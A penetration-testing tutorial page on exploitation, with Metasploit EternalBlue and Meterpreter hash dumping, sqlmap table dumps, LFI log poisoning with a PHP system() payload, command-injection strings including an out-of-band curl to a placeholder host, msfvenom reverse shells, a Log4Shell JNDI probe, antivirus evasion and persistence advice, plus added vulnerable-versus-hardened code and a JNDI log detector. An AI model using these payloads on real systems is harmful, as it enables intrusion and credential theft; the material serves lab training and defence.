Exploitation

Turning vulnerabilities into access

15 min read · Updated 2026-04-16
#metasploit #buffer-overflow #rce #sqli #lfi #cve
TL;DR
  • Exploitation converts a discovered vulnerability into unauthorized access — understanding the root cause beats running scripts blindly
  • Metasploit provides a unified framework for exploit modules, payloads, post-exploitation, and session management
  • Web vulnerabilities (SQLi, LFI, command injection) are the most common entry points in modern engagements
  • Buffer overflows require understanding memory at the register level — controlling EIP/RIP means controlling execution
  • One shell is never enough — establish persistence immediately; raw shells drop frequently and leave you starting over

Overview

Exploitation converts a discovered vulnerability into unauthorized access. It is the most technically demanding phase of a penetration test — and the most misunderstood. Reliable exploitation requires understanding the vulnerability at a protocol or memory level, not just running a script.


Prerequisites

  • Completed basic reconnaissance — you need identified targets and open services before exploiting them
  • Comfortable with Metasploit basics and both Linux and Windows command lines
  • Understanding of common protocols: HTTP, SMB, SSH, RDP

Recommended lab: HackTheBox Tier 1–2 machines — Blue and Legacy for Windows SMB exploits, Lame and Bashed for Linux. TryHackMe "Metasploit" room. PortSwigger Web Security Academy for web-specific exploits.


Vulnerability Research

Before exploiting, you need to understand what you're working with.

```bash
# Search for known exploits by CVE or product
searchsploit apache 2.4
searchsploit -x exploits/linux/remote/46984.py  # examine without copying

# Check NVD for CVSS score and patch status
# https://nvd.nist.gov/vuln/search

# Identify running software versions
nmap -sV --version-intensity 9 10.10.10.5
```

Metasploit Framework

Metasploit is the standard framework for organizing and executing exploits. It handles payload staging, encoding, session management, and post-exploitation in a unified interface.

```bash
# Start the console; db_nmap writes results straight into the workspace DB
msfconsole
msf6 > db_nmap -sV 10.10.10.5          # scan directly into DB

# Find and use a module
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.10.10.5
msf6 exploit(...) > set LHOST 10.10.14.2
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > run
```

Meterpreter Quick Reference

```bash
meterpreter > sysinfo           # OS and hostname
meterpreter > getuid            # current user context
meterpreter > getsystem         # attempt privilege escalation
meterpreter > hashdump          # dump local password hashes
meterpreter > upload /tmp/tool.exe C:\\Windows\\Temp\\tool.exe
meterpreter > shell             # drop to OS shell
meterpreter > background        # return to msf console
```

Web Application Exploitation

Web apps are the largest attack surface in modern engagements.

SQL Injection

```bash
# Automated discovery and exploitation
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D targetdb --tables
sqlmap -u "http://target.com/page?id=1" -D targetdb -T users --dump

# Bypass WAF with tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment --level=5
```
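The root cause sqlmap is probing for, shown as an added example that is not from the original page: the same `?id=` lookup written with string formatting and with a bound parameter, run against an in-memory SQLite table with constructed rows so the difference is visible offline.

```python
import sqlite3

# Added example, not part of the original page: the lookup behind a
# "page?id=1" endpoint, written once with string formatting (vulnerable)
# and once with a bound parameter (hardened). Rows are constructed.

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "admin"), (2, "bob", "user")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable: the request value is pasted into the SQL text, so
    '1 OR 1=1' rewrites the WHERE clause instead of being compared to id."""
    sql = f"SELECT name, role FROM users WHERE id = {user_id}"
    return conn.execute(sql).fetchall()

def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened: the value travels as a bound parameter. It is never parsed
    as SQL; SQLite compares the whole string against id, and because
    '1 OR 1=1' is not a number no row can match."""
    return conn.execute("SELECT name, role FROM users WHERE id = ?",
                        (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))          # one row
    print(lookup_vulnerable(db, "1 OR 1=1"))   # every row: the injection
    print(lookup_safe(db, "1 OR 1=1"))         # []: treated as data
    print(lookup_safe(db, "1"))                # one row
```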

Local File Inclusion (LFI)

```bash
# Basic traversal
curl "http://target.com/page?file=../../../../etc/passwd"

# Log poisoning: turning LFI into RCE
# 1. Inject PHP into User-Agent
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# 2. Include the log file
curl "http://target.com/page?file=/var/log/apache2/access.log&cmd=id"
```
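Why the `?file=` parameter above is exploitable, as an added example that is not from the original page: a handler that joins the parameter onto the web root (vulnerable) beside one that resolves the path and refuses anything outside the root (hardened). It assumes a throwaway temp directory with constructed files so it runs anywhere.

```python
import tempfile
from pathlib import Path

# Added example, not part of the original page: the shape of ?file= handler
# that the traversal request above abuses, beside a hardened version.
# Files live in a constructed temp directory so the example is self-contained.

BASE = Path(tempfile.mkdtemp()).resolve()
WEB_ROOT = BASE / "pages"               # the only directory the app may serve

def setup_sample_files() -> None:
    """Constructed fixtures: one legitimate page and one file outside the root
    (standing in for /etc/passwd or an access log)."""
    WEB_ROOT.mkdir(exist_ok=True)
    (WEB_ROOT / "about.html").write_text("<h1>About</h1>")
    (BASE / "passwd").write_text("root:x:0:0:root:/root:/bin/bash")

def include_vulnerable(file_param: str) -> str:
    """Vulnerable: root + user string. '../' climbs out of WEB_ROOT and an
    absolute path replaces the root entirely (Path('/a') / '/etc/x' == '/etc/x')."""
    return (WEB_ROOT / file_param).read_text()

def inside_root(file_param: str) -> bool:
    """Resolve symlinks and '..' first, then require WEB_ROOT as an ancestor."""
    target = (WEB_ROOT / file_param).resolve()
    return WEB_ROOT in target.parents

def include_safe(file_param: str) -> str:
    """Hardened: refuse anything whose resolved path leaves WEB_ROOT."""
    if not inside_root(file_param):
        raise PermissionError(f"refused: {file_param!r} resolves outside web root")
    return (WEB_ROOT / file_param).resolve().read_text()

if __name__ == "__main__":
    setup_sample_files()
    print(include_safe("about.html"))
    print(include_vulnerable("../passwd"))   # traversal succeeds
    try:
        include_safe("../passwd")
    except PermissionError as e:
        print(e)
```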

Command Injection

```bash
# Test payloads
; id
| id
&& id
`id`
$(id)

# Out-of-band detection with Burp Collaborator or interactsh
; curl http://your-oob-server.com/$(whoami)
```
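What those payloads rely on, as an added example that is not from the original page: a "ping this host" helper that splices the parameter into a shell command line (vulnerable), the same call with an argv list and no shell, and a version that also validates the input first. `echo` stands in for `ping` so it runs without network access.

```python
import re
import subprocess

# Added example, not part of the original page: a "ping this host" helper in
# the shape the ; | && `...` $(...) payloads above target, beside two fixes.
# echo stands in for ping so the example runs offline.

HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")   # hostnames / IPv4 literals

def run_vulnerable(host: str) -> str:
    """Vulnerable: the parameter is spliced into a command string that /bin/sh
    parses, so shell metacharacters inside it become shell syntax."""
    cmdline = f"echo pinging {host}"
    return subprocess.run(cmdline, shell=True, capture_output=True,
                          text=True).stdout

def run_argv_only(host: str) -> str:
    """Better: no shell at all. The parameter is one argv element, so
    '; id' or '$(whoami)' reach the program as literal text."""
    return subprocess.run(["echo", "pinging", host], capture_output=True,
                          text=True).stdout

def run_safe(host: str) -> str:
    """Hardened: positive validation first, then the argv form. The allow-list
    is deliberately strict; no shell metacharacter can pass it."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return run_argv_only(host)

def rejects(host: str) -> bool:
    """True if run_safe refuses the parameter."""
    try:
        run_safe(host)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    probe = "localhost; echo INJECTED"          # same shape as '; id' above
    print(repr(run_vulnerable(probe)))         # second command executed
    print(repr(run_argv_only(probe)))          # echoed back as plain text
    print(rejects(probe), rejects("10.10.10.5"))
```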

Buffer Overflow (Stack-Based)

Classic stack overflow exploitation on 32-bit Linux targets.

```bash
# 1. Find the offset to EIP
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
# Send pattern, get EIP value from crash, then:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41386241

# 2. Control EIP — confirm with 4 x B's at offset
# 3. Find bad characters
# 4. Find JMP ESP in loaded module (no ASLR/DEP)
#    (mona is an Immunity Debugger plugin on Windows; on a Linux target use a
#    gadget finder such as ropper for the same search)
!mona jmp -r esp

# 5. Generate shellcode
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -b "\x00" -f python
```
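Step 1 worked through, as an added example that is not from the original page or from Metasploit: a re-implementation of the cyclic pattern that pattern_create.rb emits and of the lookup pattern_offset.rb performs, so the offset behind the EIP value quoted above can be reproduced and checked offline.

```python
import string
import struct

# Added example, not part of the original page: the cyclic pattern used by
# pattern_create.rb and the search done by pattern_offset.rb, so the
# offset-to-EIP step above can be sanity-checked without the tools.

MAX_UNIQUE = 26 * 26 * 10 * 3   # 20280 bytes before the pattern repeats

def pattern_create(length: int) -> bytes:
    """Build 'Aa0Aa1Aa2...'; no 4-byte window repeats within MAX_UNIQUE."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(eip_value: int, length: int = MAX_UNIQUE) -> int:
    """Distance from buffer start to the 4 bytes that landed in EIP, or -1.
    x86 is little-endian, so the register value 0x41386241 is the in-memory
    byte sequence 41 62 38 41, i.e. b'Ab8A', which is what must be searched."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)

def eip_control_buffer(offset: int, marker: bytes = b"BBBB") -> bytes:
    """Step 2 of the procedure: filler up to the offset, then a 4-byte marker
    that should appear verbatim in EIP on the next crash."""
    return b"A" * offset + marker

if __name__ == "__main__":
    off = pattern_offset(0x41386241)          # the value quoted on the page
    print(f"offset to EIP: {off}")            # 54 for this pattern
    buf = eip_control_buffer(off)
    print(buf[off:off + 4])                   # b'BBBB'
```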

Common CVE Exploitation

| CVE | Service | Type |
|---|---|---|
| CVE-2017-0144 (MS17-010) | SMBv1 | RCE |
| CVE-2021-41773 | Apache 2.4.49 | Path traversal / RCE |
| CVE-2021-44228 (Log4Shell) | Log4j | RCE |
| CVE-2019-0708 (BlueKeep) | RDP | RCE |
| CVE-2014-6271 (Shellshock) | Bash/CGI | RCE |

```bash
# Log4Shell quick test (OOB DNS)
curl -H 'X-Api-Version: ${jndi:ldap://your-server.com/a}' http://target.com/
```
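The defender's side of that probe, as an added example that is not from the original page: a detector run over constructed access-log lines that flags the JNDI lookup string, and also unwraps nested `${...}` lookups the way Log4j 2 evaluates them, which a plain `jndi:` substring match misses.

```python
import re

# Added example, not part of the original page: a detector for the JNDI
# lookup string that the probe above plants in a header, run over constructed
# web-server log lines. Nested ${...} lookups are unwrapped before matching.

JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
INNER = re.compile(r"\$\{([^${}]*)\}")      # innermost lookup, nothing nested inside

def _resolve(m) -> str:
    """Collapse one innermost lookup the way Log4j 2 would evaluate it:
    ${x:-default} yields the default, ${lower:j} / ${upper:n} yield the
    argument (case does not matter because JNDI matches case-insensitively)."""
    body = m.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    return body.rsplit(":", 1)[-1]

def is_jndi_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup, directly or after unwrapping."""
    text = line
    while True:
        if JNDI.search(text):
            return True
        reduced = INNER.sub(_resolve, text)
        if reduced == text:          # nothing left to unwrap
            return False
        text = reduced

# Constructed sample access-log lines (not real traffic); your-server.com is
# the placeholder host used on the page.
LOG_LINES = [
    '10.0.0.7 - - "GET /index.html HTTP/1.1" 200 "curl/8.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://your-server.com/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://your-server.com/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://your-server.com/a}"',
    '10.0.0.3 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "-"',
]

def flagged_lines(lines: list) -> list:
    """Indices of lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]

if __name__ == "__main__":
    for i in flagged_lines(LOG_LINES):
        print(f"line {i}: {LOG_LINES[i]}")
```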

Operational Notes

  • Catch your shell first: run nc -lvnp 4444 before triggering the exploit.
  • Encode payloads when AV is present — msfvenom -e x86/shikata_ga_nai -i 3.
  • Test in a lab — an untested exploit against production can crash services.
  • One shell is not enough: establish persistence immediately; shells are fragile.

  • Post-Exploitation — a shell is just the start; escalate privileges, harvest credentials, and move laterally
  • Web Application Analysis — dedicated deep-dive into web-specific attack vectors
  • Password Attacks — hash dumps recovered during exploitation feed directly into cracking workflows